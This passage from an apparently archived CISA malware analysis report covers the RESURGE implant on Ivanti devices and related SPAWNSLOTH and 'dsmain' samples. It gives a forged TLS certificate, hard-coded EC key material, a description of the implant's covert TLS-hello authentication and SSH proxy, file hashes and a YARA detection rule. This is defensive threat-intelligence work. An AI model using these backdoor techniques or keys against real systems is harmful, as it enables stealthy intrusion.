51[:]af[:]d2[:]40[:]24[:]99[:]db[:]29:d4[:]60[:]9a[:]a7[:]69[:]9b[:]e9:\r\n                   96[:]bc[:]87[:]90[:]c7[:]67[:]34[:]28:91[:]f2[:]11[:]27[:]68[:]f4[:]04:\r\n                   1a[:]17[:]ff[:]c0[:]66[:]e0[:]ec[:]e9:4f[:]7a[:]e0[:]d3[:]1b[:]10[:]e4:\r\n                   39[:]06[:]bb[:]1b[:]b1[:]07[:]b0[:]68:00[:]cf[:]53[:]1c[:]be[:]75[:]0b:\r\n                   3a[:]9f\r\n               Exponent: 65537 (0x10001)\r\n       X509v3 extensions:\r\n           X509v3 Basic Constraints:\r\n               CA[:]FALSE\r\n           Netscape Cert Type:\r\n               SSL Server\r\n           Netscape Comment:\r\n               OpenSSL Generated Server Certificate\r\n           X509v3 Subject Key Identifier:\r\n               6C[:]63[:]95[:]5E[:]E9[:]36[:]B3[:]76:49[:]40[:]2E[:]89[:]7A[:]8D[:]5B[:]8A:FE[:]56[:]58[:]67\r\n           X509v3 Authority Key Identifier:\r\n               DirName:/C=??/ST=??/L=??/O=Ivanti Org/OU=??/CN=va1[.]Ivanti.net/emailAddress=??\r\n               serial:3D[:]F3[:]F7[:]DB[:]13[:]F0[:]A7[:]FE:F2[:]21[:]E4[:]15[:]79[:]48[:]BA[:]4E:E7[:]33[:]54[:]EE\r\n           X509v3 Key Usage: critical\r\n               Digital Signature, Key Encipherment\r\n           X509v3 Extended Key Usage:\r\n               TLS Web Server Authentication\r\n   Signature Algorithm: sha256WithRSAEncryption\r\n        7b[:]68[:]71[:]c7[:]6b[:]2d[:]67[:]27:01[:]9a[:]e0[:]32[:]16[:]d2[:]9b[:]d5:d1[:]4b:\r\n        b7[:]77[:]01[:]2a[:]c4[:]51[:]00[:]fd:6d[:]8a[:]e5[:]20[:]61[:]25[:]6c[:]d0:90[:]92:\r\n        51[:]47[:]3a[:]7c[:]7b[:]63[:]56[:]16:75[:]94[:]72[:]cb[:]5d[:]cf[:]92[:]7f:5a[:]f3:\r\n        c0[:]18[:]99[:]2b[:]23[:]82[:]27[:]a3:97[:]57[:]90[:]59[:]6b[:]5f[:]56[:]d4:c4[:]2e:\r\n        4f[:]80[:]69[:]3f[:]7c[:]fa[:]4d[:]eb:54[:]0e[:]1c[:]64[:]5e[:]10[:]67[:]f1:d3[:]6e:\r\n        a8[:]6c[:]04[:]7d[:]d9[:]7b[:]00[:]4b:e7[:]ae[:]cc[:]d5[:]0d[:]54[:]41[:]a9:32[:]12:\r\n        e5[:]8b[:]ba[:]fa[:]7b[:]af[:]c6[:]60:50[:]d9[:]63[:]7d[:]b5[:]7d[:]de[:]de:e0[:]ec:\r\n        5f[:]25[:]1b[:]c3[:]f9[:]0c[:]0f[:]fc:3a[:]04[:]ce[:]e5[:]ac[:]22[:]ad[:]5e:22[:]90:\r\n        87[:]b9[:]77[:]e7[:]14[:]a0[:]c4[:]0a:cc[:]f2[:]7c[:]36[:]60[:]5b[:]31[:]dc:d7[:]58:\r\n        6e[:]6a[:]f6[:]ca[:]7a[:]9d[:]85[:]18:94[:]d1[:]92[:]96[:]d4[:]5d[:]50[:]d5:f0[:]b3:\r\n        da[:]b3[:]3f[:]3b[:]80[:]f6[:]03[:]f0:32[:]20[:]ae[:]3b[:]59[:]1c[:]9f[:]5c:c7[:]1a:\r\n        0c[:]74[:]b3[:]a2[:]a7[:]42[:]df[:]7c:7f[:]6f[:]d1[:]b9[:]25[:]c7[:]73[:]98:97[:]b1:\r\n        31[:]d2[:]38[:]24[:]9d[:]97[:]f6[:]89:4d[:]0f[:]59[:]8b[:]13[:]70[:]48[:]18:c4[:]1c:\r\n        86[:]c9[:]23[:]2f[:]36[:]8c[:]19[:]d7:38[:]c9[:]90[:]da[:]12[:]09[:]49[:]56:4e[:]51:\r\n        2f[:]34[:]a7[:]e0\r\n--End Fake Ivanti TLS Certificate--\r\nThe certificate above is not a valid Ivanti TLS certificate, and was forged by the cyber threat actor. Additionally, there is no\r\nevidence the RESURGE implant utilizes this certificate in any way to secure / encrypt its communications with the remote\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 8 of 17\n\nactor. Rather, the remote hacker likely utilizes this certificate as further verification it is communicating with the RESURGE\r\nmalware, rather than the valid Ivanti web server. This certificate will be sent unencrypted across the internet during\r\nmalicious TLS connection attempts to this RESURGE implant, therefore it may be utilized as a network signature.\r\nAfter the initial authentication with the RESURGE implant utilizing the CRC32 TLS fingerprint hashing scheme and the\r\nverification of the returned fake Ivanti TLS server from the compromised Ivanti device the remote actor will follow this up,\r\nwithin the same network socket session, with a \"real\" Mutual TLS connection attempt that will provide secure access to the\r\nRESURGE remote access capabilities. This Mutual TLS session with the RESURGE implant will utilize the Elliptical Curve\r\nencryption protocol. Static analysis indicates the RESURGE implant will request the remote actors EC key to utilize for\r\nencryption, and will also verify it with a hard coded EC Certificate Authority (CA) key. Illustrated below is the hard coded\r\npublic EC TLS key use to decrypt outbound traffic, the private EC key utilized to decrypt traffic from the hacker, and the EC\r\nCA key utilized to authenticate the hacker via the Mutual TLS Session:\r\n--Begin EC TLS Keys--\r\nPublic EC Certificate-\u003e\r\nCertificate:\r\n   Data:\r\n       Version: 3 (0x2)\r\n       Serial Number:\r\n           51[:]c0[:]19[:]76[:]b6[:]ea[:]3c[:]59:5b[:]83[:]2f[:]ca[:]39[:]25[:]70[:]f1:ef[:]59[:]5c[:]2b\r\n       Signature Algorithm: ecdsa-with-SHA256\r\n       Issuer: CN = CN=QcCpIAsFy6cEI\r\n       Validity\r\n           Not Before: Dec 16 08[:]40[:]30 2024 GMT\r\n           Not After : Dec 14 08[:]40[:]30 2034 GMT\r\n       Subject: CN = CN=YUjdgeQQyLtco\r\n       Subject Public Key Info:\r\n           Public Key Algorithm: id-ecPublicKey\r\n               Public-Key: (521 bit)\r\n               pub:\r\n                   04[:]01[:]f4[:]fe[:]6c[:]d7[:]08[:]ab:f2[:]81[:]e1[:]31[:]0b[:]3a[:]51:\r\n                   ad[:]46[:]be[:]af[:]f9[:]37[:]3d[:]76:f8[:]2f[:]29[:]07[:]66[:]4a[:]4b:\r\n                   c6[:]ac[:]64[:]bf[:]9a[:]bc[:]58[:]cd:68[:]d8[:]10[:]c6[:]96[:]7b[:]69:\r\n                   c4[:]80[:]86[:]b7[:]41[:]66[:]e6[:]25:d1[:]12[:]57[:]98[:]19[:]c6[:]7a:\r\n                   99[:]15[:]ee[:]cb[:]49[:]14[:]30[:]01:0a[:]ce[:]31[:]f6[:]a1[:]f4[:]0b:\r\n                   9b[:]c5[:]17[:]de[:]68[:]82[:]64[:]9f:cb[:]3e[:]67[:]e6[:]47[:]cf[:]83:\r\n                   e0[:]43[:]de[:]61[:]6c[:]41[:]aa[:]08:7d[:]7a[:]9e[:]f3[:]18[:]5f[:]e9:\r\n                   58[:]b2[:]3e[:]7f[:]67[:]fc[:]9c[:]8d:0b[:]3d[:]00[:]03[:]35[:]df[:]7a:\r\n                   8c[:]75[:]e0[:]29[:]a1[:]86[:]a4[:]bb:6a[:]07[:]70[:]06[:]8e\r\n               ASN1 OID: secp521r1\r\n               NIST CURVE: P-521\r\n       X509v3 extensions:\r\n           X509v3 Subject Key Identifier:\r\n               3C[:]D1[:]0A[:]FB[:]79[:]61[:]94[:]B4:9E[:]A0[:]3A[:]DF[:]BF[:]1E[:]2D[:]30:4D[:]32[:]BC[:]7C\r\n           X509v3 Authority Key Identifier:\r\n               keyid[:]7F[:]A9[:]AD[:]D5[:]02[:]02[:]46:3A[:]11[:]11[:]D7[:]6E[:]E4[:]43[:]79:A8[:]FD[:]28[:]CA[:]BF\r\n   Signature Algorithm: ecdsa-with-SHA256\r\n        30[:]81[:]87[:]02[:]42[:]01[:]f9[:]92:10[:]e3[:]d0[:]13[:]a8[:]ce[:]db[:]fa:b9[:]b0:\r\n        62[:]2d[:]9e[:]57[:]c7[:]57[:]ec[:]fd:ea[:]ff[:]ea[:]3b[:]79[:]6e[:]74[:]c4:ab[:]ae:\r\n        22[:]fb[:]39[:]76[:]00[:]fa[:]5e[:]b2:ae[:]f2[:]7b[:]27[:]e6[:]55[:]67[:]e8:65[:]8e:\r\n        27[:]c2[:]0c[:]11[:]aa[:]db[:]c0[:]b3:64[:]97[:]54[:]84[:]54[:]fc[:]86[:]d3:f8[:]02:\r\n        41[:]2f[:]1d[:]78[:]d8[:]30[:]99[:]32:02[:]35[:]db[:]18[:]48[:]ae[:]bf[:]69:58[:]40:\r\n        b7[:]44[:]36[:]e0[:]00[:]7a[:]25[:]f0:39[:]cc[:]65[:]cc[:]47[:]12[:]db[:]5d:fa[:]74:\r\n        03[:]f5[:]ab[:]a0[:]b2[:]f6[:]84[:]95:b5[:]34[:]35[:]8b[:]21[:]88[:]20[:]48:34[:]07:\r\n        4b[:]96[:]a5[:]1c[:]8d[:]31[:]8e[:]42:0d[:]56[:]9a[:]36\r\nCertificate Authority Certificate--\u003e\r\nCertificate:\r\n   Data:\r\n       Version: 3 (0x2)\r\n       Serial Number:\r\n           16[:]ed[:]4d[:]83[:]94[:]89[:]37[:]57:e3[:]76[:]ca[:]1f[:]5f[:]cc[:]c3[:]24:c5[:]e3[:]ae[:]66\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 9 of 17\n\nSignature Algorithm: ecdsa-with-SHA256\r\n       Issuer: CN = CN=QcCpIAsFy6cEI\r\n       Validity\r\n           Not Before: Dec 16 08[:]40[:]30 2024 GMT\r\n           Not After : Dec 14 08[:]40[:]30 2034 GMT\r\n       Subject: CN = CN=QcCpIAsFy6cEI\r\n       Subject Public Key Info:\r\n           Public Key Algorithm: id-ecPublicKey\r\n               Public-Key: (521 bit)\r\n               pub:\r\n                   04[:]00[:]89[:]c6[:]85[:]d0[:]a8[:]68:11[:]3d[:]67[:]7b[:]17[:]21[:]fa:\r\n                   08[:]61[:]d3[:]a3[:]9e[:]39[:]c4[:]5e:e6[:]b4[:]50[:]d3[:]e6[:]81[:]2f:\r\n                   1e[:]85[:]f9[:]b5[:]9c[:]ec[:]09[:]dc:74[:]33[:]2b[:]8e[:]ab[:]a2[:]bd:\r\n                   4f[:]94[:]f0[:]66[:]b8[:]5a[:]bb[:]1a:9d[:]42[:]59[:]c2[:]b2[:]1b[:]b3:\r\n                   13[:]34[:]a1[:]0b[:]2d[:]d6[:]a0[:]01:1f[:]6d[:]c3[:]0a[:]fe[:]e7[:]02:\r\n                   3b[:]d9[:]c6[:]90[:]eb[:]3c[:]91[:]16:39[:]39[:]19[:]85[:]ef[:]97[:]bf:\r\n                   0b[:]53[:]dd[:]1b[:]bb[:]4d[:]25[:]f4:73[:]b2[:]b9[:]57[:]73[:]fe[:]93:\r\n                   64[:]f4[:]6d[:]53[:]db[:]21[:]d1[:]83:fa[:]4b[:]de[:]38[:]72[:]eb[:]90:\r\n                   60[:]45[:]92[:]ac[:]fa[:]f2[:]73[:]13:20[:]ca[:]3a[:]2e[:]26\r\n               ASN1 OID: secp521r1\r\n               NIST CURVE: P-521\r\n       X509v3 extensions:\r\n           X509v3 Subject Key Identifier:\r\n               7F[:]A9[:]AD[:]D5[:]02[:]02[:]46[:]3A:11[:]11[:]D7[:]6E[:]E4[:]43[:]79[:]A8:FD[:]28[:]CA[:]BF\r\n           X509v3 Authority Key Identifier:\r\n               keyid[:]7F[:]A9[:]AD[:]D5[:]02[:]02[:]46:3A[:]11[:]11[:]D7[:]6E[:]E4[:]43[:]79:A8[:]FD[:]28[:]CA[:]BF\r\n           X509v3 Basic Constraints: critical\r\n               CA:TRUE\r\n   Signature Algorithm: ecdsa-with-SHA256\r\n        30[:]81[:]87[:]02[:]41[:]5b[:]f6[:]aa:d7[:]51[:]2b[:]d4[:]15[:]d4[:]0a[:]cc:51[:]42:\r\n        ea[:]44[:]9c[:]74[:]ee[:]a7[:]6c[:]04:b5[:]31[:]26[:]83[:]f3[:]2b[:]d6[:]f0:3f[:]1e:\r\n        41[:]22[:]0d[:]f7[:]5e[:]9e[:]4c[:]2e:33[:]08[:]d6[:]d3[:]c7[:]f9[:]39[:]55:e0[:]e0:\r\n        50[:]ff[:]78[:]f6[:]e1[:]54[:]be[:]67:2b[:]90[:]94[:]89[:]48[:]17[:]94[:]0e:02[:]42:\r\n        00[:]8a[:]d7[:]76[:]33[:]60[:]d0[:]08:ce[:]12[:]14[:]65[:]9b[:]b4[:]f9[:]1f:59[:]1c:\r\n        75[:]86[:]5d[:]c4[:]b0[:]50[:]7c[:]22:5c[:]ce[:]f1[:]30[:]09[:]86[:]9c[:]d6:f7[:]64:\r\n        a1[:]c5[:]73[:]e2[:]60[:]64[:]fe[:]1a:7f[:]9c[:]8e[:]71[:]d1[:]bc[:]b3[:]e3:cd[:]cb:\r\n        20[:]36[:]0f[:]89[:]2a[:]63[:]0a[:]e7:0d[:]49[:]ba[:]b7\r\nPrivate EC Certificate (Hard Coded DER Format) --\u003e\r\n3081EE020100301006072A8648CE3D020106052B810400230481D63081D30201010442019FC23928A03D358BB902C4E07D844AAE52F4A6320D9\r\n--End EC TLS Keys--\r\nScreenshots\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 10 of 17\n\nFigure 1. - This pseudocode illustrates RESURGE checking whether it is running under either a process\r\nnamed web or dsmdm. If it is running under web it will hook the process's accept function to listen for and\r\nprocess TLS connections from a remote hacker. If it is running under dsmdm it will implement its embedded\r\nsecure shell capabilities. Both sections of the code, the proxy server and libssh structure, communicate via a\r\nsocket file on disk named '/home/runtime/tmp/.logsrv'.\r\nFigure 2. - This pseudocode structure within RESURGE is responsible for performing the CRC32 fingerprint\r\nhash check of incoming TLS connections to the Ivanti device. If such a packet is identified, code control will\r\nflow into the structure responsible for allowing remote proxy connections to the device. Specifically, this\r\nstructure will proxy incoming network traffic to a file on disk named /home/runtime/tmp/.logsrv. The malware\r\ncontains a separate code structure which implements full and complete secure shell access to the Ivanti device\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 11 of 17\n\nutilizing a statically linked libssh library. The secure shell implemented on this device receives network traffic\r\nvia the file on disk named /home/runtime/tmp/.logsrv. RESURGE provides the cyber threat actor remote\r\nproxy capabilities, which then proxy a direct connection to the secure shell capabilities of RESURGE.\r\nFigure 3. - This screenshot illustrates the code structure within RESURGE responsible for checking incoming\r\nnetwork packets to determine whether or not they are TLS HELLO packets. If such a packet is identified, the\r\nstructure performs the CRC32 fingerprint hash check of the random bytes value within the TLS HELLO\r\nstructure to determine whether the TLS request is from a malicious remote operator. If this fingerprint\r\nauthentication check is not successful, the malware will forward the TLS connection to the legitimate Ivanti\r\nweb server. This passive authentication methodology provides the remote actor a near undetectable means of\r\nmaintaining complete control of the Ivanti device from any location.\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 12 of 17\n\nFigure 4. - This code is utilized by the RESURGE implant to generate a TLS SERVER HELLO response\r\npacket to the hacker. The hacker requires the implant to respond with a TLS SERVER HELLO packet that\r\npasses the CRC32 TLS fingerprint hashing scheme detailed within this report. As illustrated the function starts\r\nby generating 28 bytes of random data, CRC32 hashing it, and then modifying the resultant 4 bytes with the\r\nbyteswap_ulong() function. The byte swapped CRC32 hash value will be placed in the very beginning of the\r\nrandom bytes value of the TLS HELLO structure. The remote hacker will then parse out the random bytes\r\nvalue from the returned TLS HELLO packet, CRC32 hash its final 28 bytes, byte swap the result, and then\r\ncompare it to the first 4 bytes of the TLS SERVER HELLO random byte value.\r\nFigure 5. - This pseudocode extracted from the RESURGE implant directly illustrates the initial fake TLS\r\nexchange with the remote operator. The implant allocates 65547 bytes on the stack, and uses the memory to\r\nreceive a presumed 65535 TLS initialization packet from the remote operator. It then immediately responds\r\nwith 1306 bytes which will contain a TLS SERVER HELLO response with the appended forged Ivanti public\r\nTLS certificate documented within this report. The structure will then accept another 65536 bytes of data from\r\nthe operator, and respond with 33 bytes of data. There is no evidence the buf[65547] stack array variable\r\nutilized to accept TLS data from the remote operator is stored anywhere else in memory during the call to this\r\nfunction. The return of the function will release that stack variable memory. This observation directly\r\nindicates this structure does not implement a \"real\" TLS exchange but rather an initial authentication \"check\"\r\nfrom the remote operator to ensure they are communicating with RESURGE rather than the legitimate Ivanti\r\nweb server.\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 13 of 17\n\nFigure 6. - This pseudocode contained within RESURGE illustrates the implant functioning as a proxy server,\r\nand utilizing the file on disk named /home/runtime/tmp.logsrv as a socket file. The implant will forward\r\nreceived traffic from the remote operator via a malicious proxy session to this socket file. Meanwhile a\r\nseparate process, also infected with RESURGE, will monitor this same socket file and utilize it as a proxy to\r\ncommunicate with an embedded LIBSSH server, providing a remote operator near total control of a\r\ncompromised Ivanti device.\r\nFigure 7. - This pseudocode illustrates RESURGE actively binding to the socket file\r\n/home/runtime/tmp/.logsrv to implement the remote libssh capability. The malicious proxy implemented\r\nwithin RESURGE works in conjunction with the libssh capability to provide a remote operator full access to\r\nthe compromised device.\r\n3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104\r\nTags\r\ntrojan\r\nDetails\r\nName liblogblock.so\r\nSize 95092 bytes\r\nType ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped\r\nMD5 44d09ca5b989e24ff5276d5b5ee1d394\r\nSHA1 5309f9082da0fc24ebf03cb1741fa71335224e5a\r\nSHA256 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104\r\nSHA512 63ded8e7294ee9a0d4181310d25c348d0d657d35e57740234cb98c9abfd8eb18bb3cd35a28bca3013f3e141b41131b923b39717c7ae86401928\r\nssdeep 1536:AxlL0im3r1G1+5uIEcfPTLuYzgrbwhpMTQe5pylmpsk76BAwu:Kt1+5unc3TLRujpyRzaw\r\nEntropy 5.376198\r\nAntivirus\r\nAhnLab Trojan/Linux.SpawnSloth.95092\r\nSophos Linux/Agnt-EP\r\nYARA Rules\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 14 of 17\n\nrule CISA_25993211_02 : SPAWNSLOTH trojan compromises_data_integrity\r\n{\r\nmeta:\r\n    author = \"CISA Code \u0026 Media Analysis\"\r\n    incident = \"25993211\"\r\n    date = \"2025-03-04\"\r\n    last_modified = \"20250304_0906\"\r\n    actor = \"n/a\"\r\n    family = \"SPAWN\"\r\n    capabilities = \"compromises-data-integrity\"\r\n    malware_type = \"trojan\"\r\n    tool_type = \"unknown\"\r\n    description = \"Detects SPAWNSLOTH malware samples\"\r\n    sha256_1 = \"3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104\"\r\nstrings:\r\n    $s1 = \"dslogserver\"\r\n    $s2 = \"g_do_syslog_servers_exist\"\r\n    $s3 = \"_ZN5DSLog4File3addEPKci\"\r\n    $s4 = \"dlsym\"\r\n   condition:\r\n    all of them\r\n} \r\nSIGMA Rule\r\nNo associated rule.\r\nRelationships\r\n3526af9189... Contained_Within 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda\r\nDescription\r\nThe file, 'liblogblock.so', is a 32-bit Linux ELF binary identified as a variant of SPAWNSLOTH malware, a log tampering\r\nutility.\r\nIf the program name is dslogserver, it detaches the shared memory containing the \"g_do_syslog_servers_exist\" IPC key.\r\nNext, it obtains the handle to the symbol \"_ZN5DSLog4File3addEPKci\" and calls 'funchook_create'. Funchook is an open\r\nsource tool that allows intercepting and modifying function calls at run time. The funchook_create calls funchook_alloc,\r\nwhich eventually calls mmap.\r\nThe dissembled functions were renamed with the names in the opensource for readability. The TA had removed log\r\nmessages in 'funchook_create' to make it difficult to identify the open source tool that was used.\r\nb1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d\r\nTags\r\ntrojan\r\nDetails\r\nName dsmain\r\nSize 5102976 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.16, with debug_info, not stripped\r\nMD5 6e01ef1367ea81994578526b3bd331d6\r\nSHA1 09eb513f284771461bcdc16ee28d31ce8bbe74e0\r\nSHA256 b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d\r\nSHA512 ecbda91571b0429be42017dddd2cb687ce696dd601cd02f2502119b8b732376cee2097069ca35ba0089387d58213c6140c2caf8e6c2e05733d2\r\nssdeep 49152:4ZLtRJ8ryYwd5OP5nz1kHKf26xZVKtom+YvFM4tAcRrhOBDKx76a:4ptVbQ5nz2SZstogttAcRrhOBu6a\r\nEntropy 6.020899\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 15 of 17\n\nAntivirus\r\nAhnLab Trojan/Linux.DslogdRAT\r\nAvira LINUX/AVI.Agent.apitw\r\nBitdefender Trojan.Generic.37853803\r\nEmsisoft Trojan.Generic.37853803 (B)\r\nESET Linux/Agent.AHD trojan\r\nIKARUS Trojan.Linux.Resurge\r\nMicrosoft Defender Malware\r\nQuick Heal ELF.Linux.Agent.49516.GC\r\nSophos Linux/Agnt-EP\r\nTrellix LINUX/Agent.zb\r\nVarist E64/Agent5.PK\r\nYARA Rules\r\nNo matches found.\r\nSIGMA Rule\r\nNo associated rule.\r\nDescription\r\nThe file 'dsmain' is a 64-bit Linux ELF which contains the open source script 'extract_vmlinux.sh' and the open source tool\r\n'BusyBox'.\r\nThe file takes three arguments (-e, -d, -g). The -e argument is used to encrypt a file with an Advance Encryption Standard\r\n(AES) key. The -d argument is used to decrypt a file using an AES key. The -g argument is used to invoke the script\r\n'extract_vmlinux.sh' where it is written to /tmp/extract_vmlinux.sh and is used to extract the uncompressed vmlinux from a\r\nkernel image. The TA extracts vmlinux to analyze the kernel’s code, identify vulnerabilities and potentially exploit the\r\nsystem.\r\nBusyBox is an open-source project tool from a collection of Unix utilities that are widely used by embedded devices and\r\nindustrial control systems (ICS). When a TA accesses a device running BusyBox, the TA can execute a series of BusyBox\r\ncommands to perform various functions such as downloading and executing malicious payloads on the compromised device.\r\nThe file 'dsmain' uses specified applets from BusyBox.\r\n--Begin Applets Used From BusyBox--\r\nbzcat\r\nbzip2\r\ncat\r\ncpio\r\nfind\r\ngunzip\r\ngzip\r\nlzop\r\nsed\r\nsh\r\nstrings\r\ntail\r\ntar\r\ntouch\r\ntr\r\nunlzma\r\nunlzop\r\nunxz\r\nxxd\r\nxz\r\n--End Applets Used From BusyBox--\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 16 of 17\n\nRelationship Summary\r\n52bbc44eb4... Contains 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104\r\n3526af9189... Contained_Within 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk .\r\nCan I submit malware to CISA? Malware samples can be submitted via the methods below:\r\nWeb: https://www.cisa.gov/resources-tools/services/malware-next-generation-analysis\r\nFor larger files (over 100MB), please reach out to CISA for instructions.\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nhttps://www.cisa.gov/news-events/analysis-reports/ar25-087a\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/analysis-reports/ar25-087a"
	],
	"report_names": [
		"ar25-087a"
	],
	"threat_actors": [],
	"ts_created_at": 1777429240,
	"ts_updated_at": 1777450987,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e66bf4f24b2a40dc574ef2eb391547580205d627.pdf",
		"text": "https://archive.orkl.eu/e66bf4f24b2a40dc574ef2eb391547580205d627.txt",
		"img": "https://archive.orkl.eu/e66bf4f24b2a40dc574ef2eb391547580205d627.jpg"
	}
}